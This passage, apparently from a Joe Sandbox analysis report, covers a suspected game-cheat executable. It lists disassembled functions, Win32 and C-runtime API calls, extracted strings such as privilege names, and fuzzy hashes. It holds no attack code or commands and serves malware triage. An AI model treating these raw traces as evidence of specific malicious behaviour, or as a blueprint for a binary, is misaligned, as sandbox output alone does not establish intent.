                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: af02e015d55f618e31e2840337ed7d618a731c175ed8cbef00c01e532af9c553
                                                    • Instruction ID: 856e94504ac821e765945553b9d8dae4b60e3d27dcc3c2536b280abe72d85309
                                                    • Opcode Fuzzy Hash: af02e015d55f618e31e2840337ed7d618a731c175ed8cbef00c01e532af9c553
                                                    • Instruction Fuzzy Hash: 1CF03131904319BBCB219FA0EC09B9EBFB4EF54715F0440A9F805E2260DB759E45CAB4
                                                    APIs
                                                      • Part of subcall function 00D0081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D00836
                                                      • Part of subcall function 00D0081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CFF2D8,Crypt32.dll,00000000,00CFF35C,?,?,00CFF33E,?,?,?), ref: 00D00858
                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CFF2E4
                                                    • GetProcAddress.KERNEL32(00D381C8,CryptUnprotectMemory), ref: 00CFF2F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                    • API String ID: 2141747552-1753850145
                                                    • Opcode ID: 58836d03ab6aa623e40876bbc857203e4e61e3728aa09c8f8f86441b6ebaaaea
                                                    • Instruction ID: cb2366169631b6db557a5f87e8c7c05d54f30adafff981fc4be7b885842ce710
                                                    • Opcode Fuzzy Hash: 58836d03ab6aa623e40876bbc857203e4e61e3728aa09c8f8f86441b6ebaaaea
                                                    • Instruction Fuzzy Hash: 3FE02630904711AEC7309F34A80DB117ED4AF24B08F00C82DF0DAD3280DBB8D1458B70
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AdjustPointer$_abort
                                                    • String ID:
                                                    • API String ID: 2252061734-0
                                                    • Opcode ID: 9d17a62093414ae3fa55de332e8ff33ed09cf747843ee61b8e991a12af975570
                                                    • Instruction ID: 80c7cf56456e0484f37a4413b2694d42d6c141394683291de8b00291bf373846
                                                    • Opcode Fuzzy Hash: 9d17a62093414ae3fa55de332e8ff33ed09cf747843ee61b8e991a12af975570
                                                    • Instruction Fuzzy Hash: F0519BB1600216BFDB289F54F845BFAB7A5EF54310F284129E941466A1EB32EDE0D7F0
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00D1BF39
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D1BF5C
                                                      • Part of subcall function 00D18E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D1CA2C,00000000,?,00D16CBE,?,00000008,?,00D191E0,?,?,?), ref: 00D18E38
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D1BF82
                                                    • _free.LIBCMT ref: 00D1BF95
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D1BFA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                    • String ID:
                                                    • API String ID: 336800556-0
                                                    • Opcode ID: daea4146cb41265b31d98f42b030125beef6df9795813f020807cdf5d338d295
                                                    • Instruction ID: 82ab31314fa2185222c537fc4143f08fc24bd823f6dc0266650d6fce5b4b9787
                                                    • Opcode Fuzzy Hash: daea4146cb41265b31d98f42b030125beef6df9795813f020807cdf5d338d295
                                                    • Instruction Fuzzy Hash: 1D01A7766057157F23315AB67C4DCFB6A6DDEC6BB1318012AF904C2241EF66CD4395B0
                                                    APIs
                                                    • GetLastError.KERNEL32(?,00D31030,00000200,00D191AD,00D1617E,?,?,?,?,00CFD984,?,?,?,00000004,00CFD710,?), ref: 00D1986E
                                                    • _free.LIBCMT ref: 00D198A3
                                                    • _free.LIBCMT ref: 00D198CA
                                                    • SetLastError.KERNEL32(00000000,00D23A34,00000050,00D31030), ref: 00D198D7
                                                    • SetLastError.KERNEL32(00000000,00D23A34,00000050,00D31030), ref: 00D198E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    • Opcode ID: 7f895945108067e8ac2fc95813580fc232c418237e95f19e6a869af3057ae4d1
                                                    • Instruction ID: 8d5002889c8bc0008ff7c7ee68faea1c73bb737946798876317f6161562b1b29
                                                    • Opcode Fuzzy Hash: 7f895945108067e8ac2fc95813580fc232c418237e95f19e6a869af3057ae4d1
                                                    • Instruction Fuzzy Hash: 8701F4362447017BC22267287DB59EBA669DBE37717250139F905D2292EF34CC865271
                                                    APIs
                                                      • Part of subcall function 00D011CF: ResetEvent.KERNEL32(?), ref: 00D011E1
                                                      • Part of subcall function 00D011CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00D011F5
                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00D00F21
                                                    • CloseHandle.KERNEL32(?,?), ref: 00D00F3B
                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00D00F54
                                                    • CloseHandle.KERNEL32(?), ref: 00D00F60
                                                    • CloseHandle.KERNEL32(?), ref: 00D00F6C
                                                      • Part of subcall function 00D00FE4: WaitForSingleObject.KERNEL32(?,000000FF,00D01206,?), ref: 00D00FEA
                                                      • Part of subcall function 00D00FE4: GetLastError.KERNEL32(?), ref: 00D00FF6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                    • String ID:
                                                    • API String ID: 1868215902-0
                                                    • Opcode ID: 9de32c196d63b380ff19d5efc111d86cea35b57b3b53b593575fc7d60ce24fb0
                                                    • Instruction ID: bc98161c94ca8ddeb8ef96517c8502ecb312fe9e3b0e3e0b0d56288762d3962e
                                                    • Opcode Fuzzy Hash: 9de32c196d63b380ff19d5efc111d86cea35b57b3b53b593575fc7d60ce24fb0
                                                    • Instruction Fuzzy Hash: 68015E72100744FFC7329F64DD84BC6BBAAFB58710F000929F2AA922A0CB757A45DB74
                                                    APIs
                                                    • _free.LIBCMT ref: 00D1C817
                                                      • Part of subcall function 00D18DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34), ref: 00D18DE2
                                                      • Part of subcall function 00D18DCC: GetLastError.KERNEL32(00D23A34,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34,00D23A34), ref: 00D18DF4
                                                    • _free.LIBCMT ref: 00D1C829
                                                    • _free.LIBCMT ref: 00D1C83B
                                                    • _free.LIBCMT ref: 00D1C84D
                                                    • _free.LIBCMT ref: 00D1C85F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: f9063ce6cb6a23fb7631cffa2c15390bcdcf6343633762cbdce2dfdee4918235
                                                    • Instruction ID: 89b5941abaaf498c51b3b7d3a942d2ba74ba32b9215b51c23e79991681efc143
                                                    • Opcode Fuzzy Hash: f9063ce6cb6a23fb7631cffa2c15390bcdcf6343633762cbdce2dfdee4918235
                                                    • Instruction Fuzzy Hash: 10F0E772554310BF8620EB69F8C6C9A73E9EB14B147A92819F108D7652CF71FCC08A74
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00D01FE5
                                                    • _wcslen.LIBCMT ref: 00D01FF6
                                                    • _wcslen.LIBCMT ref: 00D02006
                                                    • _wcslen.LIBCMT ref: 00D02014
                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00CFB371,?,?,00000000,?,?,?), ref: 00D0202F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$CompareString
                                                    • String ID:
                                                    • API String ID: 3397213944-0
                                                    • Opcode ID: 76edfdd8dc49f1130e275b19722d219735b7462d5ff05706d90a3f520e868535
                                                    • Instruction ID: 29c95e31f1f9db660422e9fbeaeba60a5d88036f83446b5b139ecaddde7ec188
                                                    • Opcode Fuzzy Hash: 76edfdd8dc49f1130e275b19722d219735b7462d5ff05706d90a3f520e868535
                                                    • Instruction Fuzzy Hash: E4F01D32008214BBCF225F55EC49EDE7F26EB44760B118555F61A5B0A1CF72D6A1D6B0
                                                    APIs
                                                    • _free.LIBCMT ref: 00D1891E
                                                      • Part of subcall function 00D18DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34), ref: 00D18DE2
                                                      • Part of subcall function 00D18DCC: GetLastError.KERNEL32(00D23A34,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34,00D23A34), ref: 00D18DF4
                                                    • _free.LIBCMT ref: 00D18930
                                                    • _free.LIBCMT ref: 00D18943
                                                    • _free.LIBCMT ref: 00D18954
                                                    • _free.LIBCMT ref: 00D18965
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 965884eb5902b17bf0650d728e0d685f0dd011187541d03bb281c44347fca91f
                                                    • Instruction ID: 2a7a6691be7d3702d908524a027b94ff63e79e5a75ed2921f373f7b45686450b
                                                    • Opcode Fuzzy Hash: 965884eb5902b17bf0650d728e0d685f0dd011187541d03bb281c44347fca91f
                                                    • Instruction Fuzzy Hash: BEF05E75810322AFC616EF14FC024A93FB1F726726745050AF814D63B1CF354986EBB5
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _swprintf
                                                    • String ID: %ls$%s: %s
                                                    • API String ID: 589789837-2259941744
                                                    • Opcode ID: 27c988c92171328a90d05a02475a09d767ff74f0f39c5aad9b9d0951b47c8b4e
                                                    • Instruction ID: 572f7f8b1a6926dc22e9f44675832da7f17ba7591186ad436a3121b2d125e7ec
                                                    • Opcode Fuzzy Hash: 27c988c92171328a90d05a02475a09d767ff74f0f39c5aad9b9d0951b47c8b4e
                                                    • Instruction Fuzzy Hash: 8A51C83D288708F6F7211A948D46F367665AB05F04F648606F3DF644E2D9E3E510673B
                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe,00000104), ref: 00D17FAE
                                                    • _free.LIBCMT ref: 00D18079
                                                    • _free.LIBCMT ref: 00D18083
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _free$FileModuleName
                                                    • String ID: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                                    • API String ID: 2506810119-2444262678
                                                    • Opcode ID: 487145916eb8546eec0985f11422cc4fca3bb6be4d5f24ea1f7a77631ca905ca
                                                    • Instruction ID: b4a76273eb67df3dbfca2d686bff52a2cb7671738b76bc902f5dd91b1a20703e
                                                    • Opcode Fuzzy Hash: 487145916eb8546eec0985f11422cc4fca3bb6be4d5f24ea1f7a77631ca905ca
                                                    • Instruction Fuzzy Hash: 05318F71A00318BFDB21DF95E8819EEBBB8EF99310B14406AF80497211DE718AC99B71
                                                    APIs
                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00D131FB
                                                    • _abort.LIBCMT ref: 00D13306
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: EncodePointer_abort
                                                    • String ID: MOC$RCC
                                                    • API String ID: 948111806-2084237596
                                                    • Opcode ID: e5cb0ebf32b22acb4828027858511feacc36f936b354e0997369b3dc77bc3574
                                                    • Instruction ID: dcca6e73a1ffa2a0e63658d151e86fd19b24b1ca1dece4fa87ed21d0c9975544
                                                    • Opcode Fuzzy Hash: e5cb0ebf32b22acb4828027858511feacc36f936b354e0997369b3dc77bc3574
                                                    • Instruction Fuzzy Hash: 55414C71900209BFCF15EF98ED81AEEBBB5FF48304F188059F91467211DB359A90DB64
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF7406
                                                      • Part of subcall function 00CF3BBA: __EH_prolog.LIBCMT ref: 00CF3BBF
                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00CF74CD
                                                      • Part of subcall function 00CF7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CF7AAB
                                                      • Part of subcall function 00CF7A9C: GetLastError.KERNEL32 ref: 00CF7AF1
                                                      • Part of subcall function 00CF7A9C: CloseHandle.KERNEL32(?), ref: 00CF7B00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                    • API String ID: 3813983858-639343689
                                                    • Opcode ID: c80ea72fbe74a52bca6b1bc3d6ee78cad52d628544c5ea194ef72e62bebbab9d
                                                    • Instruction ID: 2731f37d5ab6ceea0c75fefa63d6ca245b3a66623acbeca2a57332e66ee7e28c
                                                    • Opcode Fuzzy Hash: c80ea72fbe74a52bca6b1bc3d6ee78cad52d628544c5ea194ef72e62bebbab9d
                                                    • Instruction Fuzzy Hash: 5131BE71A0435DAADF91ABA4DC45BFE7BB8AF08344F044115FA15E7282CB748A84CB72
                                                    APIs
                                                      • Part of subcall function 00CF1316: GetDlgItem.USER32(00000000,00003021), ref: 00CF135A
                                                      • Part of subcall function 00CF1316: SetWindowTextW.USER32(00000000,00D235F4), ref: 00CF1370
                                                    • EndDialog.USER32(?,00000001), ref: 00D0AD98
                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00D0ADAD
                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D0ADC2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ItemText$DialogWindow
                                                    • String ID: ASKNEXTVOL
                                                    • API String ID: 445417207-3402441367
                                                    • Opcode ID: 07899cf5b569589b4d46c2b68c619b6cdea817d14c48a2576b7f9f2a481fad6b
                                                    • Instruction ID: 6d81b98805a8349e0fbf155a55591ea0c4a4e4959562364320df9cd74af72b7f
                                                    • Opcode Fuzzy Hash: 07899cf5b569589b4d46c2b68c619b6cdea817d14c48a2576b7f9f2a481fad6b
                                                    • Instruction Fuzzy Hash: A211D032240304AFD3518F6CEC45FBA7B69EB5A743F440000F644EB6E0D7629915A733
                                                    APIs
                                                    • __fprintf_l.LIBCMT ref: 00CFD954
                                                    • _strncpy.LIBCMT ref: 00CFD99A
                                                      • Part of subcall function 00D01DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D31030,00000200,00CFD928,00000000,?,00000050,00D31030), ref: 00D01DC4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                    • String ID: $%s$@%s
                                                    • API String ID: 562999700-834177443
                                                    • Opcode ID: 90e9d90b3103cb3a6c83fce7adefa1ee7e36deb1b6f9eff42740b795ef87cc8e
                                                    • Instruction ID: 184b09f4118af3058ceac1692999343a5fe600cef8f566c63a5e5ecb104792e1
                                                    • Opcode Fuzzy Hash: 90e9d90b3103cb3a6c83fce7adefa1ee7e36deb1b6f9eff42740b795ef87cc8e
                                                    • Instruction Fuzzy Hash: 8921A83244024CAEDF61EFA4DC05FFE7BA9EF05704F044422FA2596192E672D748CB62
                                                    APIs
                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00CFAC5A,00000008,?,00000000,?,00CFD22D,?,00000000), ref: 00D00E85
                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00CFAC5A,00000008,?,00000000,?,00CFD22D,?,00000000), ref: 00D00E8F
                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00CFAC5A,00000008,?,00000000,?,00CFD22D,?,00000000), ref: 00D00E9F
                                                    Strings
                                                    • Thread pool initialization failed., xrefs: 00D00EB7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
